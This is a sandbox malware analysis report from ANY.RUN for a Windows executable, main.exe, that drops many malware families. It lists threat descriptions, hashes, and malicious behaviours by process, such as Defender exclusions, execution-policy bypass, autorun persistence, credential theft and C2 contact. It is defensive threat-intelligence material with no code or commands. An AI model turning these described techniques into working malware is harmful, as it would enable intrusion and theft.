Malware analysis main.exe Malicious activity | ANY.RUN

Add for printing

File name:	main.exe
Full analysis:	https://app.any.run/tasks/a312aeb9-53c3-46ac-8888-75c6eb531b83
Verdict:	Malicious activity
Threats:	Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. Agent Tesla ist eine Spyware, die Informationen über die Aktionen ihrer Opfer sammelt, indem sie Tastatureingaben und Benutzerinteraktionen aufzeichnet. Sie wird auf der speziellen Website, auf der diese Malware verkauft wird, fälschlicherweise als legitime Software vermarktet. Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. MetaStealer is an info-stealing malware primarily targeting sensitive data like login credentials, payment details, and browser history. It typically infects systems via phishing emails or malicious downloads and can exfiltrate data to a command and control (C2) server. MetaStealer is known for its stealthy techniques, including evasion and persistence mechanisms, which make it difficult to detect. This malware has been actively used in various cyberattacks, particularly for financial theft and credential harvesting from individuals and organizations. Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world. njRAT ist ein Trojaner für den Fernzugriff. Es handelt sich um einen der am weitesten verbreiteten RATs auf dem Markt, der eine Fülle von Bildungsinformationen bietet. Interessierte Angreifer können sogar Tutorials auf YouTube finden. Dies macht ihn zu einem der beliebtesten RATs der Welt. Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely. Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. RedLine Stealer is a malicious program that collects users’ confidential data from browsers, systems, and installed software. It also infects operating systems with other malware. Remcos is a commercially distributed remote administration and surveillance tool that has been widely observed in unauthorized deployments, where threat actors use it to perform remote actions on compromised machines. It is actively maintained by its vendor, with new versions and feature updates released on a frequent, near-monthly basis. Remcos ist eine Malware vom Typ RAT, mit der Angreifer aus der Ferne Aktionen auf infizierten Computern durchführen können. Diese Malware ist extrem aktiv und wird fast jeden Monat mit Updates auf den neuesten Stand gebracht. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Tycoon 2FA is a phishing-as-a-service (PhaaS) platform designed to bypass multi-factor authentication (MFA) protections, particularly targeting Microsoft 365 and Gmail accounts. Its advanced evasion techniques and modular architecture make it a significant threat to organizations relying on MFA for security. Vidar is a dangerous malware that steals information and cryptocurrency from infected users. It derives its name from the ancient Scandinavian god of Vengeance. This stealer has been terrorizing the internet since 2018. WannaCry is a famous Ransomware that utilizes the EternalBlue exploit. This malware is known for infecting at least 200,000 computers worldwide and it continues to be an active and dangerous threat. WannaCry ist eine bekannte Ransomware, die die EternalBlue-Schwachstelle nutzt. Diese Malware ist dafür bekannt, dass sie mindestens 200.000 Computer weltweit infiziert hat, und sie ist weiterhin eine aktive und gefährliche Bedrohung. Malware Trends Tracker >>>
Analysis date:	June 28, 2025, 13:02:20
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	loader python github amadey possible-phishing meterpreter backdoor payload metasploit auto lumma stealer azorult networm amus phishing nanocore rat remcos clickfix generic miner wannacry ransomware neshta storm1747 tycoon evasion lclipper clipper formbook njrat snake keylogger telegram redline metastealer vidar dcrat quasar aurotun screenconnect rmm-tool rdp bladabindi pyinstaller stormkitty stealc agenttesla ftp exfiltration botnet auto-sch-xml asyncrat remote koistealer koiloader koi pastebin websocket qrcode susp-powershell
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:	C942A56638772644D847709D906FA23D
SHA1:	12D6B77FEC2244CDC4050A083AA741185CC48010
SHA256:	56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A
SSDEEP:	98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 360 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 300 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Uses Task Scheduler to autorun other applications
  - cmd.exe (PID: 7016)
  - quasarat.exe (PID: 12440)
  - quasarat.exe (PID: 7500)
  - quasarat.exe (PID: 16088)
- Changes powershell execution policy (Bypass)
  - main.exe (PID: 3780)
  - cmd.exe (PID: 2804)
  - powershell.exe (PID: 7956)
  - werefult.exe (PID: 10260)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 6572)
  - powershell.exe (PID: 7956)
  - powershell.exe (PID: 8284)
  - powershell.exe (PID: 8304)
  - powershell.exe (PID: 9012)
  - powershell.exe (PID: 9324)
  - powershell.exe (PID: 9760)
  - powershell.exe (PID: 9484)
  - powershell.exe (PID: 9672)
  - powershell.exe (PID: 10244)
  - powershell.exe (PID: 10364)
  - powershell.exe (PID: 10276)
  - powershell.exe (PID: 10324)
  - powershell.exe (PID: 10356)
  - powershell.exe (PID: 10388)
  - powershell.exe (PID: 10396)
  - powershell.exe (PID: 10480)
  - powershell.exe (PID: 11196)
  - powershell.exe (PID: 9604)
  - powershell.exe (PID: 9724)
  - powershell.exe (PID: 11732)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 13984)
  - powershell.exe (PID: 11584)
  - powershell.exe (PID: 15976)
  - powershell.exe (PID: 15808)
  - powershell.exe (PID: 10252)
- AMADEY mutex has been found
  - donie30.exe (PID: 684)
  - dumer.exe (PID: 7376)
  - dumer.exe (PID: 13928)
- LUMMA has been found (auto)
  - main.exe (PID: 3780)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
- REMCOS has been found (auto)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
- Changes the autorun value in the registry
  - loader.exe (PID: 8524)
  - explorer.exe (PID: 9696)
  - syspool.exe (PID: 10340)
  - runtimebroker.exe (PID: 10316)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - msconfig.exe (PID: 3584)
  - remcos_a.exe (PID: 12348)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - WannaCry.exe (PID: 12312)
  - klass.exe (PID: 9172)
  - ls.exe (PID: 12144)
  - Amus.exe (PID: 10348)
  - Axam.a.exe (PID: 640)
  - Adobe.exe (PID: 10656)
  - hersey.exe (PID: 11632)
  - sFFG7Wg.exe (PID: 3880)
  - Axam.exe (PID: 8716)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 9452)
  - Axam.exe (PID: 9360)
  - quasarat.exe (PID: 12440)
  - Axam.exe (PID: 12536)
  - Axam.exe (PID: 7600)
  - Axam.exe (PID: 10648)
  - Axam.exe (PID: 1932)
  - Axam.exe (PID: 13752)
  - Axam.exe (PID: 13840)
  - Axam.exe (PID: 13628)
  - ganja5.exe (PID: 12704)
  - reg.exe (PID: 11488)
  - Axam.exe (PID: 11620)
  - Axam.exe (PID: 5540)
  - Axam.exe (PID: 14868)
  - reg.exe (PID: 11028)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 14196)
  - quasarat.exe (PID: 7500)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 10536)
  - installer.exe (PID: 10332)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 12668)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 12180)
  - Axam.exe (PID: 15988)
  - Axam.exe (PID: 15532)
  - Axam.exe (PID: 1760)
  - quasarat.exe (PID: 16088)
  - werefult.exe (PID: 10260)
- Registers / Runs the DLL via REGSVR32.EXE
  - loader.exe (PID: 8524)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - runtimebroker.exe (PID: 10316)
- Executing a file with an untrusted certificate
  - tomcat8.exe (PID: 9340)
- GENERIC has been found (auto)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - Amus.exe (PID: 10348)
  - cabal.exe (PID: 11608)
- FORMBOOK has been found (auto)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
- NJRAT has been found (auto)
  - main.exe (PID: 3780)
  - main.exe (PID: 3780)
  - your_app.exe (PID: 12364)
  - Bloxflip%20Predictor.exe (PID: 11640)
- Create files in the Startup directory
  - explorer.exe (PID: 9696)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.a.exe (PID: 640)
- METASPLOIT has been found (auto)
  - main.exe (PID: 3780)
- NETWORM mutex has been found
  - Amus.exe (PID: 10348)
- AZORULT mutex has been detected
  - L2.exe (PID: 11140)
- METASPLOIT has been detected (SURICATA)
  - main.exe (PID: 3780)
- METERPRETER has been detected (SURICATA)
  - main.exe (PID: 3780)
- SCREENCONNECT has been found (auto)
  - main.exe (PID: 3780)
- REMCOS mutex has been found
  - remcos_a.exe (PID: 12348)
- REMCOS has been detected
  - remcos_a.exe (PID: 12348)
- WANNACRY mutex has been found
  - WannaCry.exe (PID: 12312)
- NESHTA mutex has been found
  - Setup.exe (PID: 9444)
  - epic.exe (PID: 15268)
- CLICKFIX has been detected (SURICATA)
  - svchost.exe (PID: 2200)
- PHISHING has been detected (SURICATA)
  - svchost.exe (PID: 2200)
- LCLIPPER mutex has been found
  - sFFG7Wg.exe (PID: 3880)
- Adds path to the Windows Defender exclusion list
  - Crypt.exe (PID: 7256)
  - ap.exe (PID: 8948)
- Changes Windows Defender settings
  - Crypt.exe (PID: 7256)
- SNAKEKEYLOGGER has been detected (SURICATA)
  - mexx.exe (PID: 8964)
- FORMBOOK has been detected
  - netsh.exe (PID: 11220)
  - explorer.exe (PID: 4772)
- VIDAR mutex has been found
  - MSBuild.exe (PID: 8500)
- METASTEALER has been detected (SURICATA)
  - cc.exe (PID: 12764)
- DCRAT mutex has been found
  - startud.exe (PID: 8588)
- AUROTUN mutex has been found
  - Crypt.exe (PID: 7256)
- REDLINE has been detected (SURICATA)
  - cc.exe (PID: 12764)
- Connects to the CnC server
  - cc.exe (PID: 12764)
  - Crypt.exe (PID: 7256)
  - dumer.exe (PID: 13928)
  - powershell.exe (PID: 12388)
  - explorer.exe (PID: 4772)
- Uses sleep, probably for evasion detection (SCRIPT)
  - wscript.exe (PID: 9372)
- QUASAR mutex has been found
  - quasarat.exe (PID: 12440)
  - quasarat.exe (PID: 7500)
  - quasarat.exe (PID: 16088)
- Actions looks like stealing of personal data
  - mexx.exe (PID: 8964)
  - MSBuild.exe (PID: 8500)
  - cc.exe (PID: 12764)
  - MARCUSS.exe (PID: 12728)
- Steals credentials from Web Browsers
  - mexx.exe (PID: 8964)
  - MARCUSS.exe (PID: 12728)
  - MSBuild.exe (PID: 8500)
  - cc.exe (PID: 12764)
- Deletes a file (SCRIPT)
  - wscript.exe (PID: 9372)
- NJRAT mutex has been found
  - Bloxflip%20Predictor.exe (PID: 11640)
- UAC/LUA settings modification
  - reg.exe (PID: 12080)
- WannaCry Ransomware is detected
  - WannaCry.exe (PID: 12312)
- AGENTTESLA has been detected (SURICATA)
  - MARCUSS.exe (PID: 12728)
- AMADEY has been detected (SURICATA)
  - gaved.exe (PID: 14316)
  - dumer.exe (PID: 13928)
- Uses AES cipher (POWERSHELL)
  - powershell.exe (PID: 6572)
  - powershell.exe (PID: 10276)
  - powershell.exe (PID: 10480)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 13984)
  - powershell.exe (PID: 11584)
  - powershell.exe (PID: 15976)
  - powershell.exe (PID: 15808)
  - powershell.exe (PID: 10252)
- Writes a file to the Word startup folder
  - WannaCry.exe (PID: 12312)
- RANSOMWARE has been detected
  - WannaCry.exe (PID: 12312)
- ASYNCRAT has been detected (SURICATA)
  - foncar.exe (PID: 11668)
- Modifies files in the Chrome extension folder
  - WannaCry.exe (PID: 12312)
- Dynamically loads an assembly (POWERSHELL)
  - powershell.exe (PID: 9324)
  - powershell.exe (PID: 10480)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 9760)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 10396)
- KOI has been detected (SURICATA)
  - powershell.exe (PID: 12388)
- Script downloads file (POWERSHELL)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
- Scans artifacts that could help determine the target
  - dw20.exe (PID: 7664)
- Uses Task Scheduler to run other applications
  - cmd.exe (PID: 15300)
- FORMBOOK has been detected (SURICATA)
  - explorer.exe (PID: 4772)
SUSPICIOUS
- Executable content was dropped or overwritten
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - donie30.exe (PID: 684)
  - bravo29.exe (PID: 7248)
  - loader.exe (PID: 8524)
  - Setup.exe (PID: 9444)
  - Ganja54.exe (PID: 9172)
  - explorer.exe (PID: 9696)
  - test1.exe (PID: 9436)
  - syspool.exe (PID: 10340)
  - CryptoLocker.exe (PID: 10300)
  - Ganja99.exe (PID: 1760)
  - Prolin.exe (PID: 9308)
  - Ganja90.exe (PID: 11624)
  - lol.exe (PID: 11928)
  - Ganja176.exe (PID: 11648)
  - remcos_a.exe (PID: 12348)
  - WannaCry.exe (PID: 12312)
  - Ganja35.exe (PID: 11616)
  - 4De3.exe (PID: 12168)
  - Amus.exe (PID: 10348)
  - Axam.a.exe (PID: 640)
  - porn.exe (PID: 12488)
  - Crypt.exe (PID: 7256)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - your_app.exe (PID: 12364)
  - sFFG7Wg.exe (PID: 3880)
  - cabal.exe (PID: 11608)
  - discord.exe (PID: 12752)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - ap.exe (PID: 8948)
  - powershell.exe (PID: 6572)
  - epic.exe (PID: 15268)
  - ganja5.exe (PID: 12704)
  - csc.exe (PID: 8448)
  - csc.exe (PID: 13716)
  - powershell.exe (PID: 10276)
  - powershell.exe (PID: 2428)
  - csc.exe (PID: 10812)
  - powershell.exe (PID: 11584)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - installer.exe (PID: 10332)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
  - csc.exe (PID: 11096)
  - csc.exe (PID: 14796)
  - csc.exe (PID: 5372)
  - csc.exe (PID: 15012)
  - csc.exe (PID: 13760)
  - csc.exe (PID: 11364)
  - csc.exe (PID: 3668)
  - csc.exe (PID: 7868)
  - csc.exe (PID: 11784)
  - csc.exe (PID: 8624)
  - csc.exe (PID: 14656)
  - csc.exe (PID: 15212)
  - csc.exe (PID: 12968)
  - csc.exe (PID: 11464)
  - csc.exe (PID: 10368)
  - csc.exe (PID: 11960)
- Process drops legitimate windows executable
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - WannaCry.exe (PID: 12312)
  - cabal.exe (PID: 11608)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
- The process drops C-runtime libraries
  - main.exe (PID: 7100)
- Process drops python dynamic module
  - main.exe (PID: 7100)
- Application launched itself
  - main.exe (PID: 7100)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - cmd.exe (PID: 9916)
  - cmd.exe (PID: 11240)
  - powershell.exe (PID: 7956)
- Loads Python modules
  - main.exe (PID: 3780)
- Starts CMD.EXE for commands execution
  - main.exe (PID: 3780)
  - remcos_a.exe (PID: 12348)
  - WannaCry.exe (PID: 12312)
  - Bugsoft.exe (PID: 11116)
  - windowsupdatetimer.exe (PID: 11692)
  - hersey.exe (PID: 11632)
  - netsh.exe (PID: 11220)
  - winxclient.exe (PID: 12328)
  - sFFG7Wg.exe (PID: 3880)
  - esp.exe (PID: 12372)
  - discord.exe (PID: 12752)
  - quasarat.exe (PID: 12440)
  - cmd.exe (PID: 9916)
  - cmd.exe (PID: 11240)
  - forfiles.exe (PID: 15100)
  - quasarat.exe (PID: 7500)
  - forfiles.exe (PID: 12568)
  - quasarat.exe (PID: 16088)
  - werefult.exe (PID: 10260)
  - forfiles.exe (PID: 10620)
- The process checks if it is being run in the virtual environment
  - main.exe (PID: 3780)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - runtimebroker.exe (PID: 10316)
  - allonymouslyfFpY.exe (PID: 11220)
- Executing commands from a ".bat" file
  - main.exe (PID: 3780)
  - WannaCry.exe (PID: 12312)
  - Bugsoft.exe (PID: 11116)
  - hersey.exe (PID: 11632)
  - discord.exe (PID: 12752)
  - quasarat.exe (PID: 12440)
  - cmd.exe (PID: 9916)
  - quasarat.exe (PID: 7500)
  - quasarat.exe (PID: 16088)
- Starts POWERSHELL.EXE for commands execution
  - main.exe (PID: 3780)
  - cmd.exe (PID: 2804)
  - Crypt.exe (PID: 7256)
  - f.exe (PID: 9940)
  - MSBuild.exe (PID: 8500)
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 1392)
  - UniversalSpoofer.exe (PID: 8044)
  - Monotone.exe (PID: 1036)
  - Monotone.exe (PID: 6892)
  - TempSpoofer.exe (PID: 6292)
  - TempSpoofer.exe (PID: 4044)
  - powershell.exe (PID: 7956)
  - werefult.exe (PID: 10260)
- The process executes Powershell scripts
  - main.exe (PID: 3780)
  - cmd.exe (PID: 2804)
- Reads security settings of Internet Explorer
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 1392)
  - Monotone.exe (PID: 1036)
  - Monotone.exe (PID: 6892)
  - TempSpoofer.exe (PID: 4044)
  - sFFG7Wg.exe (PID: 3880)
  - TempSpoofer.exe (PID: 6292)
  - donie30.exe (PID: 684)
  - bravo29.exe (PID: 7248)
  - Helper.exe (PID: 7784)
  - UniversalSpoofer.exe (PID: 8044)
  - Setup.exe (PID: 9444)
  - test1.exe (PID: 9436)
  - Amus.exe (PID: 10348)
  - L2.exe (PID: 11140)
  - cabal.exe (PID: 11608)
  - lol.exe (PID: 11928)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - hersey.exe (PID: 11632)
  - remcos_a.exe (PID: 12348)
  - 4De3.exe (PID: 12168)
  - discord.exe (PID: 12752)
  - LOIC.exe (PID: 11212)
  - your_app.exe (PID: 12364)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - MSBuild.exe (PID: 8500)
  - c1.exe (PID: 12380)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - quasarat.exe (PID: 12440)
  - ap.exe (PID: 8948)
  - dumer.exe (PID: 13928)
  - !WannaDecryptor!.exe (PID: 13500)
  - gaved.exe (PID: 14316)
  - ShellExperienceHost.exe (PID: 13552)
  - epic.exe (PID: 15268)
  - ganja5.exe (PID: 12704)
  - quasarat.exe (PID: 7500)
  - quasarat.exe (PID: 16088)
- Process requests binary or script from the Internet
  - main.exe (PID: 3780)
  - cabal.exe (PID: 11608)
- Connects to the server without a host name
  - main.exe (PID: 3780)
  - VXHDH.exe (PID: 1612)
  - syspool.exe (PID: 10340)
  - cabal.exe (PID: 11608)
  - esp32.exe (PID: 11988)
  - dumer.exe (PID: 13928)
  - gaved.exe (PID: 14316)
  - powershell.exe (PID: 9760)
  - powershell.exe (PID: 12388)
- Connects to unusual port
  - main.exe (PID: 3780)
  - my%20file.exe (PID: 2180)
  - Worldofficee.exe (PID: 7528)
  - Worldoffice.exe (PID: 8352)
  - payload.exe (PID: 8956)
  - tcp_windows_amd64.exe (PID: 8932)
  - shell.exe (PID: 9660)
  - vshell.exe (PID: 8476)
  - windowsupdatetimer.exe (PID: 11692)
  - svchost.exe (PID: 12696)
  - winxclient.exe (PID: 12328)
  - svchost.exe (PID: 11896)
  - Adobe.exe (PID: 10656)
  - https.exe (PID: 11108)
  - cc.exe (PID: 12764)
  - XClient.exe (PID: 8016)
  - esp.exe (PID: 12372)
  - demon.exe (PID: 10380)
  - march.exe (PID: 11132)
  - Crypt.exe (PID: 7256)
  - startud.exe (PID: 8588)
  - esp32.exe (PID: 11988)
  - Clien123.exe (PID: 9504)
  - foncar.exe (PID: 11668)
  - MARCUSS.exe (PID: 12728)
  - installs.exe (PID: 7988)
  - bot.exe (PID: 7284)
- Potential Corporate Privacy Violation
  - main.exe (PID: 3780)
  - cabal.exe (PID: 11608)
- Starts itself from another location
  - bravo29.exe (PID: 7248)
  - donie30.exe (PID: 684)
  - Ganja54.exe (PID: 9172)
  - CryptoLocker.exe (PID: 10300)
  - Ganja99.exe (PID: 1760)
  - Ganja90.exe (PID: 11624)
  - Ganja176.exe (PID: 11648)
  - Ganja35.exe (PID: 11616)
  - test1.exe (PID: 9436)
- The process creates files with name similar to system file names
  - loader.exe (PID: 8524)
  - main.exe (PID: 3780)
  - 4De3.exe (PID: 12168)
  - WannaCry.exe (PID: 12312)
- Block-list domains
  - main.exe (PID: 3780)
- Contacting a server suspected of hosting an Exploit Kit
  - main.exe (PID: 3780)
- Creates file in the systems drive root
  - Prolin.exe (PID: 9308)
  - 4De3.exe (PID: 12168)
  - Setup.exe (PID: 9444)
  - Amus.exe (PID: 10348)
  - Axam.a.exe (PID: 640)
  - Axam.exe (PID: 8716)
  - Axam.exe (PID: 12536)
  - Axam.exe (PID: 9360)
  - Axam.exe (PID: 9452)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 7600)
